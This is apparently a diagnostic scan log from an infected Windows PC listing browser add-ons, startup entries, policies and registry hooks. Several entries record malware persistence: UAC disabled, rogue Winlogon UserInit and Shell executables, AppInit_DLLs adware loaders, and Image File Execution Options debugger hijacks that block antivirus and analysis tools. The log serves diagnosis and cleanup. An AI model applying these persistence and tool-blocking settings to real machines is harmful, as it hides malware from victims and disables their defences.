FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\3\NP_wtapp.dll ()
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@nsroblox.roblox.com/launcher: C:\Program Files (x86)\Roblox\Versions\version-ca7bb36aabe54be5\\NPRobloxProxy.dll ()
FF - HKCU\Software\MozillaPlugins\@powerchallenge.com/PowerLoader: C:\Users\Owner\AppData\LocalLow\POWERC~1\nppowerloader.dll (Power Challenge Sweden AB)
FF - HKCU\Software\MozillaPlugins\@Skype Limited.com/Facebook Video Calling Plugin: C:\Users\Owner\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF - HKCU\Software\MozillaPlugins\@talk.google.com/GoogleTalkPlugin: C:\Users\Owner\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF - HKCU\Software\MozillaPlugins\@talk.google.com/O1DPlugin: C:\Users\Owner\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\Owner\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\Owner\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\Owner\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF - HKCU\Software\MozillaPlugins\anvisoft.com/AdblockPlugin: C:\ProgramData\Anvisoft\Anvi Smart Defender 2\extensions\npAdblockPlugin.dll (Anvisoft)
FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{000a9d1c-beef-4f90-9363-039d445309b8}: C:\Program Files (x86)\Google\Google Gears\Firefox\ [2010/04/03 18:24:02 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\smartwebprinting@hp.com: C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2010/04/13 18:41:37 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}: C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\coFFPlgn\ [2014/05/26 00:10:30 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\lesstabs@lesstabs.com: C:\Program Files (x86)\Mozilla Firefox\extensions\lesstabs@lesstabs.com
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{BBDA0591-3099-440a-AA10-41764D9DB4DB}: C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\IPSFF [2013/10/13 18:28:09 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{C7AE725D-FA5C-4027-BB4C-787EF9F8248A}: C:\Program Files (x86)\RelevantKnowledge\firefox
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 29.0.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2014/04/11 21:24:38 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 29.0.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2014/05/27 08:09:25 | 000,000,000 | ---D | M]
[2002/01/01 03:15:28 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\Extensions
[2014/05/28 08:28:35 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\Firefox\Profiles\47jsurhl.default-1385867679964\extensions
[2014/04/27 17:57:51 | 000,000,000 | ---D | M] ("CloudShare plugin for Firefox") -- C:\Users\Owner\AppData\Roaming\mozilla\Firefox\Profiles\47jsurhl.default-1385867679964\extensions\itst-firefox-plugin@itstructures.com
[2014/04/19 22:05:58 | 000,000,000 | ---D | M] (tinymediaplayer Support) -- C:\Users\Owner\AppData\Roaming\mozilla\Firefox\Profiles\47jsurhl.default-1385867679964\extensions\jid1-RYwhP9dQdGfXkQ@jetpack
[2014/05/27 08:08:04 | 000,000,000 | ---D | M] (SNT) -- C:\Users\Owner\AppData\Roaming\mozilla\Firefox\Profiles\47jsurhl.default-1385867679964\extensions\yieuo@fis-.org
[2014/05/15 20:06:35 | 000,371,488 | ---- | M] () (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\extensions\client@anonymox.net.xpi
[2013/12/01 13:11:48 | 000,021,497 | ---- | M] () (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\extensions\leethax@leethax.net.xpi
[2014/01/06 16:50:27 | 000,017,971 | ---- | M] () (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\extensions\{c1970c0d-dbe6-4d91-804f-c9c0de643a57}.xpi
[2014/04/30 20:06:27 | 000,957,880 | ---- | M] () (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2014/05/25 19:26:03 | 000,001,014 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\searchplugins\trovi-search.xml
[2014/05/25 19:26:03 | 000,007,855 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\searchplugins\WebSearch.xml
[2013/05/24 15:05:58 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2013/04/11 17:48:38 | 000,000,000 | ---D | M] (Hotspot Shield Helper (Please allow this installation)) -- C:\Program Files (x86)\Mozilla Firefox\extensions\afurladvisor@anchorfree.com
[2014/05/03 14:36:57 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/05/10 13:10:26 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
========== Chrome ==========
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - plugin: Error reading preferences file
CHR - Extension: Entanglement Web App = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aciahcmjmecflokailenpkdchphgkefd\3.4.9_0\
CHR - Extension: Flicktion = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ahlonbncfpcjijmjkchpcbjbfanloaci\0.0.4_0\
CHR - Extension: Angry Birds = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aknpkdffaafgjchaibgeefbgmgeghloj\1.5.0.7_0\
CHR - Extension: save on = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\balakjmegnjmgocoiikmpocclkilbiil\2.14\
CHR - Extension: Kaboom = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\beahobhgpojnjfdjglaehfhdanaioode\1.5_0\
CHR - Extension: Google Voice Search Hotword (Beta) = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\
CHR - Extension: Adblock Plus = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.8.1_0\
CHR - Extension: Pandora = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbangkleohkafngihneedemihgfeikcl\1.0_0\
CHR - Extension: tinymediaplayer = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnnjbpfkbiophjcpjfhojffigapncemg\1.0_0\
CHR - Extension: Authy = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gaedmjdfmmahhbjefcbgaolhhanlaolb\1.0.6_0\
CHR - Extension: Authy = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gaedmjdfmmahhbjefcbgaolhhanlaolb\1.0.7_0\
CHR - Extension: Hola Better Internet = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio\1.3.403_0\
CHR - Extension: Hola Better Internet = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio\1.3.434_0\
CHR - Extension: YoutubeAdblocker = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\iicmcmnnjkkckalmfchmpcnommcckolc\1.0\
CHR - Extension: Little Alchemy = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\knkapnclbofjjgicpkfoagdjohlfjhpd\0.0.15.7_0\
CHR - Extension: AnviAdblock = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\lhmiofmipcpmhgihiecmpiekcacigpgb\1.0_0\
CHR - Extension: Poppit = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbkbpnkkkipelfledbfocopglifcfmi\2.2_0\
CHR - Extension: Rain Alarm = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\meaikaglpfemjncbioflellmppndgmok\1.1.20_0\
CHR - Extension: christmas theme = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\mnfcgdpeaofnjiipbmdafbjjfjpdceel\1.2_0\
CHR - Extension: ROBLOX Outfit Saver Extension = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\mpaohnjlgfabcooefhihmafmdcbliakf\1.6.0_0\
CHR - Extension: SNT = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\mphagcbbnchmmbdpneljbjolhkkgoeak\2.1\
CHR - Extension: PlayBryte = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\neipakemjlgaoklhkealjjannpkccloa\1.0_0\
CHR - Extension: SaVe on = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nfmolpfmkngcnbmoogplkkblmdkjolcm\2.14\
CHR - Extension: Google Wallet = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_1\
CHR - Extension: Google Quick Scroll = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\okanipcmceoeemlbjnmnbdibhgpbllgc\127\
CHR - Extension: YoutubeAdblocker = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfiagcconkapemepmladlcppnelbpngf\1.0\
O1 HOSTS File: ([2014/04/27 16:07:22 | 000,000,000 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:64bit: - BHO: (no name) - ##TOOLBAR_DISABLED_##{F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - No CLSID value found.
O2:64bit: - BHO: (sAve on) - {247C8BF4-6150-D2A7-EEA7-037A2265B307} - C:\Program Files (x86)\sAve on\ZQmJngjs4s.x64.dll ()
O2:64bit: - BHO: (YoutubeAdblocker) - {9344EB71-F5E0-A7D6-39BD-A44814EFFA4B} - C:\Program Files (x86)\YoutubeAdblocker\AyR5_S.x64.dll ()
O2:64bit: - BHO: (SNT) - {E289C34B-639B-FEBE-CF7B-47CE1B6284A5} - C:\Program Files (x86)\SNT\Xj.x64.dll ()
O2:64bit: - BHO: (DataMngr) - {F2D6C718-7E52-428E-8852-365C4B1A6E36} - C:\Program Files (x86)\Settings Alerter\Datamngr\x64\BrowserConnection.dll (Koyote-Lab, inc)
O2:64bit: - BHO: (no name) - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - No CLSID value found.
O2 - BHO: (sAve on) - {247C8BF4-6150-D2A7-EEA7-037A2265B307} - C:\Program Files (x86)\sAve on\ZQmJngjs4s.dll ()
O2 - BHO: (Norton Identity Protection) - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Security Suite\Engine\20.4.0.40\coIEPlg.dll File not found
O2 - BHO: (Norton Vulnerability Protection) - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Security Suite\Engine\20.4.0.40\IPS\IPSBHO.DLL File not found
O2 - BHO: (Java Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (YoutubeAdblocker) - {9344EB71-F5E0-A7D6-39BD-A44814EFFA4B} - C:\Program Files (x86)\YoutubeAdblocker\AyR5_S.dll ()
O2 - BHO: (Java Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (SNT) - {E289C34B-639B-FEBE-CF7B-47CE1B6284A5} - C:\Program Files (x86)\SNT\Xj.dll ()
O2 - BHO: (DataMngr) - {F2D6C718-7E52-428E-8852-365C4B1A6E36} - C:\Program Files (x86)\Settings Alerter\Datamngr\BrowserConnection.dll (Koyote-Lab, inc)
O3:64bit: - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - ##TOOLBAR_DISABLED_##{47833539-D0C5-4125-9FA8-0819E2EAAC93} - No CLSID value found.
O3 - HKLM\..\Toolbar: (Contribute Toolbar) - ##TOOLBAR_DISABLED_##{517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\/Adobe Contribute CS4/contributeieplugin.dll ()
O3 - HKLM\..\Toolbar: (no name) - ##TOOLBAR_DISABLED_##{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - ##TOOLBAR_DISABLED_##{EF99BD32-C1FB-11D2-892F-0090271D4F88} - No CLSID value found.
O3 - HKLM\..\Toolbar: (Norton Toolbar) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine\20.4.0.40\coIEPlg.dll File not found
O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {1EED0937-BCCD-4F7B-96F7-EE6D485BAE2D} - No CLSID value found.
O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {41534932-2D56-3600-76A7-7A786E7484D7} - No CLSID value found.
O3 - HKCU\..\Toolbar\WebBrowser: (Adobe PDF) - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O4 - HKLM..\Run: [] File not found
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [HKLM] C:\Windows\SysWOW64\install\server.exe (Microsoft Corporation)
O4 - HKLM..\Run: [hpsysdrv] c:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe (Hewlett-Packard)
O4 - HKLM..\Run: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe (Intel Corporation)
O4 - HKLM..\Run: [KiesTrayAgent] C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe (Samsung Electronics Co., Ltd.)
O4 - HKLM..\Run: [LogMeIn Hamachi Ui] C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe (LogMeIn Inc.)
O4 - HKLM..\Run: [PlusService] C:\Program Files (x86)\Yuna Software\Messenger Plus!\PlusService.exe (Yuna Software)
O4 - HKLM..\Run: [QHSafeTray] C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe ()
O4 - HKCU..\Run: [CloudSystemBooster] C:\Program Files (x86)\Anvisoft\Cloud System Booster\CloudSystemBooster.exe (Anvisoft)
O4 - HKCU..\Run: [Clownfish] C:\Program Files (x86)\Clownfish\Clownfish.exe (Bogdan Sharkov)
O4 - HKCU..\Run: [File] C:\Program Files (x86)\Java\jre7\bin\javaw.exe (Oracle Corporation)
O4 - HKCU..\Run: [GoogleChromeAutoLaunch_721577D41E77D440C916E2687EBA0267] C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
O4 - HKCU..\Run: [LightShot] C:\Users\Owner\AppData\Local\Skillbrains\lightshot\Lightshot.exe ()
O4 - HKCU..\Run: [MSDCSC] C:\Program Files (x86)\Java\jre7\bin\javaw.exe (Oracle Corporation)
O4 - HKCU..\Run: [SmileboxTray] C:\Users\Owner\AppData\Roaming\Smilebox\SmileboxTray.exe (Smilebox, Inc.)
O4 - HKCU..\Run: [Steam] C:\Program Files (x86)\Steam\steam.exe (Valve Corporation)
O4 - HKCU..\Run: [uTorrent] C:\Users\Owner\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)
O4 - HKCU..\Run: [Windows applicaton] C:\Users\Owner\AppData\Roaming\File Name.exe (ghaMJsw)
O4 - HKCU..\Run: [WindowsSystem] C:\Users\Owner\Documents\WindSys\ws.exe (Microsoft Corp.)
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Activities present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SoftwareSASGeneration = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLinkedConnections = 1
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDesktopCleanupWizard = 1
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDesktop = 0
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: LogonHoursAction = 2
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DontDisplayLogonHoursWarnings = 1
O8:64bit: - Extra context menu item: Append Link Target to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8:64bit: - Extra context menu item: Append to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8:64bit: - Extra context menu item: Convert Link Target to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8:64bit: - Extra context menu item: Convert to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8:64bit: - Extra context menu item: Translate this web page with Babylon - res://C:\Program Files (x86)\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/ActionTU.htm File not found
O8:64bit: - Extra context menu item: Translate with Babylon - res://C:\Program Files (x86)\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Action.htm File not found
O8 - Extra context menu item: Append Link Target to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8 - Extra context menu item: Append to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8 - Extra context menu item: Convert Link Target to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8 - Extra context menu item: Convert to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8 - Extra context menu item: Translate this web page with Babylon - res://C:\Program Files (x86)\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/ActionTU.htm File not found
O8 - Extra context menu item: Translate with Babylon - res://C:\Program Files (x86)\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Action.htm File not found
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O16 - DPF: {149E45D8-163E-4189-86FC-45022AB2B6C9} file:///C:/Program%20Files%20(x86)/Bejeweled%203/Images/stg_drm.ocx (SpinTop DRM Control)
O16 - DPF: {6A060448-60F9-11D5-A6CD-0002B31F7455} (ExentInf Class)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{CF96632F-9E52-4C44-9872-C8C04B9D8AD8}: DhcpNameServer = 192.168.1.1
O18:64bit: - Protocol\Handler\livecall - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\ms-itss - No CLSID value found
O18:64bit: - Protocol\Handler\msnim - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - AppInit_DLLs: (C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll) - C:\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC64Loader.dll (Client Connect LTD)
O20:64bit: - AppInit_DLLs: (C:\PROGRA~3\Wincert\WIN64C~1.DLL) - File not found
O20:64bit: - AppInit_DLLs: (C:\PROGRA~2\SO_X64~1.BO~) - C:\Program Files (x86)\SO_x64.Booster ()
O20 - AppInit_DLLs: (C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC32Loader.dll) - C:\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC32Loader.dll (Client Connect LTD)
O20 - AppInit_DLLs: (c:\progra~2\settin~1\datamngr\iebho.dll) - c:\Program Files (x86)\Settings Alerter\Datamngr\IEBHO.dll (Koyote-Lab, inc)
O20 - AppInit_DLLs: (c:\progra~2\so0cb7~1.bo~) - c:\Program Files (x86)\SO.Booster ()
O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Users\Owner\Documents\WindSys\ws.exe) - C:\Users\Owner\Documents\WindSys\ws.exe (Microsoft Corp.)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Users\Owner\AppData\Roaming\Microsoft\csrss.exe) - File not found
O20 - HKCU Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKCU Winlogon: Shell - ("C:\Windows\SysWOW64\Windows Server\wserver.exe") - C:\Windows\SysWOW64\Windows Server\wserver.exe ()
O20:64bit: - Winlogon\Notify\avldr: DllName - (avldr64.dll) - File not found
O20:64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O24 - Desktop BackupWallPaper: C:\Windows\Web\Wallpaper\awisp.jpg
O27:64bit: - HKLM IFEO\ASD2.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\ASD2Srv.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\AvastSvc.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\AvastUI.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\avcenter.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\avconfig.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\avgnt.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\avguard.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\avp.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\avscan.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\bdagent.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\blindman.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\ccuac.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\ComboFix.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\egui.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\hijackthis.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\instup.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\keyscrambler.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\mbam.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\mbamgui.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\mbampt.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\mbamscheduler.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\mbamservice.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\MpCmdRun.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\MSASCui.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\MsMpEng.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\msseces.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\rstrui.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\SDFiles.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\SDMain.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\SDWinSec.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\spybotsd.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\SUPERAntiSpyware.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\wireshark.exe: Debugger - nqij.exe File not found
O27:64bit: - HKLM IFEO\zlclient.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\ASD2.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\ASD2Srv.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\AvastSvc.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\AvastUI.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\avcenter.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\avconfig.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\avgnt.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\avguard.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\avp.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\avscan.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\bdagent.exe: Debugger - nqij.exe File not found
